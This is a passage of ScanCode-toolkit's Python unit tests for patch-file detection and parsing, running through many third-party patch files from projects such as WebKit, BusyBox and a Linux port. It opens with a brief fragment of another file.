task['uptodate'] = [utils.config_changed(kw)]
yield utils.apply_filters(task, filters)
if not flag:
yield {
'basename': self.name,
'actions': (),
}
| mit |
yashdsaraf/scancode-toolkit | tests/extractcode/test_patch.py | 1 | 72541 | #
# Copyright (c) 2017 nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import codecs
import json
import os
from unittest.case import expectedFailure
from commoncode.testcase import FileBasedTesting
from commoncode.text import as_unicode
from extractcode import patch
class TestIsPatch(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def test_is_not_patch(self):
test_dir = self.get_test_loc('patch/not_patches', copy=True)
for r, _, files in os.walk(test_dir):
for f in files:
test_file = os.path.join(r, f)
assert not patch.is_patch(test_file)
def test_is_patch(self):
test_dir = self.get_test_loc('patch/patches', copy=True)
for r, _, files in os.walk(test_dir):
for f in files:
if not f.endswith('expected'):
test_file = os.path.join(r, f)
assert patch.is_patch(test_file)
def check_patch(test_file, expected_file, regen=False):
result = [list(pi) for pi in patch.patch_info(test_file)]
result = [[as_unicode(s), as_unicode(t), map(as_unicode, lines)]
for s, t, lines in result]
if regen:
with codecs.open(expected_file, 'wb', encoding='utf-8') as regened:
json.dump(result, regened, indent=2)
with codecs.open(expected_file, 'rb', encoding='utf-8') as expect:
expected = json.load(expect)
assert expected == result
class TestPatchInfoFailing(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
# FIXME: these tests need love and eventually a bug report upstream
@expectedFailure
def test_patch_info_patch_patches_misc_webkit_opensource_patches_sync_xhr_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/sync_xhr.patch')
# fails with Exception Unable to parse patch file
list(patch.patch_info(test_file))
@expectedFailure
def test_patch_info_patch_patches_problematic_opensso_patch(self):
test_file = self.get_test_loc(u'patch/patches/problematic/OpenSSO.patch')
# fails with Exception Unable to parse patch file
list(patch.patch_info(test_file))
class TestPatchInfo(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def test_patch_info_patch_patches_dnsmasq_2_63_1_diff(self):
test_file = self.get_test_loc(u'patch/patches/dnsmasq_2.63-1.diff')
expected_file = self.get_test_loc('patch/patches/dnsmasq_2.63-1.diff.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_dropbear_2012_55_1_diff(self):
test_file = self.get_test_loc(u'patch/patches/dropbear_2012.55-1.diff')
expected_file = self.get_test_loc('patch/patches/dropbear_2012.55-1.diff.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_electricfence_2_0_5_longjmp_patch(self):
test_file = self.get_test_loc(u'patch/patches/ElectricFence-2.0.5-longjmp.patch')
expected_file = self.get_test_loc('patch/patches/ElectricFence-2.0.5-longjmp.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_electricfence_2_1_vaarg_patch(self):
test_file = self.get_test_loc(u'patch/patches/ElectricFence-2.1-vaarg.patch')
expected_file = self.get_test_loc('patch/patches/ElectricFence-2.1-vaarg.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_electricfence_2_2_2_madvise_patch(self):
test_file = self.get_test_loc(u'patch/patches/ElectricFence-2.2.2-madvise.patch')
expected_file = self.get_test_loc('patch/patches/ElectricFence-2.2.2-madvise.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_electricfence_2_2_2_pthread_patch(self):
test_file = self.get_test_loc(u'patch/patches/ElectricFence-2.2.2-pthread.patch')
expected_file = self.get_test_loc('patch/patches/ElectricFence-2.2.2-pthread.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_libmediainfo_0_7_43_diff(self):
test_file = self.get_test_loc(u'patch/patches/libmediainfo-0.7.43.diff')
expected_file = self.get_test_loc('patch/patches/libmediainfo-0.7.43.diff.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_avahi_0_6_25_patches_configure_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/avahi-0.6.25/patches/configure.patch')
expected_file = self.get_test_loc('patch/patches/misc/avahi-0.6.25/patches/configure.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_avahi_0_6_25_patches_main_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/avahi-0.6.25/patches/main.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/avahi-0.6.25/patches/main.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_busybox_patches_fix_subarch_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/busybox/patches/fix-subarch.patch')
expected_file = self.get_test_loc('patch/patches/misc/busybox/patches/fix-subarch.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_busybox_patches_gtrick_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/busybox/patches/gtrick.patch')
expected_file = self.get_test_loc('patch/patches/misc/busybox/patches/gtrick.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_busybox_patches_workaround_old_uclibc_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/busybox/patches/workaround_old_uclibc.patch')
expected_file = self.get_test_loc('patch/patches/misc/busybox/patches/workaround_old_uclibc.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_curl_patches_ekioh_cookie_fix_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/curl/patches/ekioh_cookie_fix.patch')
expected_file = self.get_test_loc('patch/patches/misc/curl/patches/ekioh_cookie_fix.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_e2fsprogs_1_37_uuidlibs_blkidlibs_only_target_makefile_in_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/e2fsprogs-1.37/uuidlibs_blkidlibs_only_target_Makefile.in.patch')
expected_file = self.get_test_loc('patch/patches/misc/e2fsprogs-1.37/uuidlibs_blkidlibs_only_target_Makefile.in.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_ekioh_svg_opensource_patches_patch_ekioh_config_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/ekioh-svg/opensource/patches/patch_ekioh_config.patch')
expected_file = self.get_test_loc('patch/patches/misc/ekioh-svg/opensource/patches/patch_ekioh_config.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_accelerated_blit_webcore_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/accelerated_blit_webcore.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/accelerated_blit_webcore.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_accelerated_blit_webkit_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/accelerated_blit_webkit.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/accelerated_blit_webkit.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_animated_gif_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/animated_gif.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/animated_gif.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_computed_style_for_transform_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/computed_style_for_transform.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/computed_style_for_transform.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_cookies_fixes_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/cookies_fixes.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/cookies_fixes.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_dlna_image_security_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/dlna_image_security.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/dlna_image_security.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_draw_pattern_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/draw_pattern.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/draw_pattern.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_enable_logs_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/enable_logs.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/enable_logs.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_enable_proxy_setup_log_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/enable_proxy_setup_log.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/enable_proxy_setup_log.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_file_secure_mode_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/file_secure_mode.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/file_secure_mode.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_http_secure_mode_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/http_secure_mode.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/http_secure_mode.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_javascript_screen_resolution_fix_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/javascript_screen_resolution_fix.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/javascript_screen_resolution_fix.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_keycode_webkit_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/keycode_webkit.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/keycode_webkit.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_local_file_access_whitelist_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/local_file_access_whitelist.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/local_file_access_whitelist.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_lower_case_css_attributes_for_transform_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/lower_case_css_attributes_for_transform.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/lower_case_css_attributes_for_transform.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_moving_empty_image_leaves_garbage_on_screen_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/moving_empty_image_leaves_garbage_on_screen.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/moving_empty_image_leaves_garbage_on_screen.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_open_in_new_window_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/open_in_new_window.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/open_in_new_window.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_plugin_thread_async_call_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/plugin_thread_async_call.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/plugin_thread_async_call.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_ram_cache_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/ram_cache.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/ram_cache.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_ram_cache_meta_expires_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/ram_cache_meta_expires.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/ram_cache_meta_expires.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_speedup_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/speedup.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/speedup.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_sync_xhr_https_access_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/sync_xhr_https_access.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/sync_xhr_https_access.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_useragent_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/useragent.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/useragent.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_webcore_keyevent_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/webcore_keyevent.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/webcore_keyevent.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_webcore_videoplane_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/webcore_videoplane.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/webcore_videoplane.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_webkit_cssparser_parsetransitionshorthand_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/webkit_CSSParser_parseTransitionShorthand.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/webkit_CSSParser_parseTransitionShorthand.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_webkit_database_support_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/webkit_database_support.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/webkit_database_support.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_webkit_dlna_images_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/webkit_dlna_images.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/webkit_dlna_images.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_webkit_finish_animations_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/webkit_finish_animations.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/webkit_finish_animations.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_patches_webkit_xmlhttprequest_cross_domain_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/patches/webkit_xmlhttprequest_cross_domain.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/patches/webkit_xmlhttprequest_cross_domain.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_prepatches_moto_createobject_null_check_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/prepatches/moto-createobject-null-check.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/prepatches/moto-createobject-null-check.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_prepatches_moto_dump_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/prepatches/moto-dump.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/prepatches/moto-dump.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_prepatches_moto_getopensourcenotice_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/prepatches/moto-getopensourcenotice.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/prepatches/moto-getopensourcenotice.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_prepatches_moto_jsvalue_equal_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/prepatches/moto-jsvalue-equal.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/prepatches/moto-jsvalue-equal.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_prepatches_moto_timer_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/prepatches/moto-timer.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/prepatches/moto-timer.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_prepatches_support_parallel_idl_gen_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/prepatches/support_parallel_idl_gen.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/prepatches/support_parallel_idl_gen.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_prepatches_webcore_accept_click_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/prepatches/webcore_accept_click.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/prepatches/webcore_accept_click.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_webkit_opensource_prepatches_webcore_videoplane_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/webkit/opensource/prepatches/webcore_videoplane.patch')
expected_file = self.get_test_loc('patch/patches/misc/webkit/opensource/prepatches/webcore_videoplane.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_icu_patches_ekioh_config_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/icu/patches/ekioh-config.patch')
expected_file = self.get_test_loc('patch/patches/misc/icu/patches/ekioh-config.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_jfsutils_patches_largefile_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/jfsutils/patches/largefile.patch')
expected_file = self.get_test_loc('patch/patches/misc/jfsutils/patches/largefile.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libasyncns_asyncns_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libasyncns/asyncns.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/libasyncns/asyncns.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libasyncns_configure_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libasyncns/configure.patch')
expected_file = self.get_test_loc('patch/patches/misc/libasyncns/configure.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libdaemon_0_13_patches_configure_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libdaemon-0.13/patches/configure.patch')
expected_file = self.get_test_loc('patch/patches/misc/libdaemon-0.13/patches/configure.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libiconv_patches_cp932_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libiconv/patches/cp932.patch')
expected_file = self.get_test_loc('patch/patches/misc/libiconv/patches/cp932.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libiconv_patches_make_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libiconv/patches/make.patch')
expected_file = self.get_test_loc('patch/patches/misc/libiconv/patches/make.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libjpeg_v6b_patches_config_sub_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libjpeg-v6b/patches/config.sub.patch')
expected_file = self.get_test_loc('patch/patches/misc/libjpeg-v6b/patches/config.sub.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libjpeg_v6b_patches_configure_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libjpeg-v6b/patches/configure.patch')
expected_file = self.get_test_loc('patch/patches/misc/libjpeg-v6b/patches/configure.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libjpeg_v6b_patches_makefile_cfg_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libjpeg-v6b/patches/makefile.cfg.patch')
expected_file = self.get_test_loc('patch/patches/misc/libjpeg-v6b/patches/makefile.cfg.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libpng_1_2_8_makefile_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libpng-1.2.8/makefile.patch')
expected_file = self.get_test_loc('patch/patches/misc/libpng-1.2.8/makefile.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libpng_1_2_8_pngconf_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libpng-1.2.8/pngconf.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/libpng-1.2.8/pngconf.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libpng_1_2_8_pngrutil_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libpng-1.2.8/pngrutil.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/libpng-1.2.8/pngrutil.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_libxml2_patches_iconv_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/libxml2/patches/iconv.patch')
expected_file = self.get_test_loc('patch/patches/misc/libxml2/patches/iconv.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_0001_stmmac_updated_the_driver_and_added_several_fixes_a_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/0001-stmmac-updated-the-driver-and-added-several-fixes-a.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/0001-stmmac-updated-the-driver-and-added-several-fixes-a.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_addrspace_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/addrspace.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/addrspace.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_arch_sh_kernel_cpu_init_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/arch_sh_kernel_cpu_init.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/arch_sh_kernel_cpu_init.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_arch_sh_makefile_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/arch_sh_Makefile.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/arch_sh_Makefile.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_arch_sh_mm_init_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/arch_sh_mm_init.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/arch_sh_mm_init.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_bigphysarea_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/bigphysarea.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/bigphysarea.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_bugs_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/bugs.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/bugs.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_cache_sh4_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/cache-sh4.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/cache-sh4.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_cfi_cmdset_0001_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/cfi_cmdset_0001.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/cfi_cmdset_0001.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_cfi_util_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/cfi_util.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/cfi_util.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_char_build_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/char_build.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/char_build.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_cmdlinepart_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/cmdlinepart.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/cmdlinepart.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_console_printk_loglevel_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/console_printk_loglevel.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/console_printk_loglevel.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_delayed_i2c_read_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/delayed_i2c_read.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/delayed_i2c_read.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_devinet_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/devinet.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/devinet.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_disable_carrier_sense_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/disable_carrier_sense.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/disable_carrier_sense.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_disable_unaligned_printks_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/disable_unaligned_printks.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/disable_unaligned_printks.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_dma_api_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/dma-api.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/dma-api.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_do_mounts_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/do_mounts.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/do_mounts.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_drivers_net_makefile_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/drivers_net_Makefile.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/drivers_net_Makefile.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_fan_ctrl_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/fan_ctrl.patch')
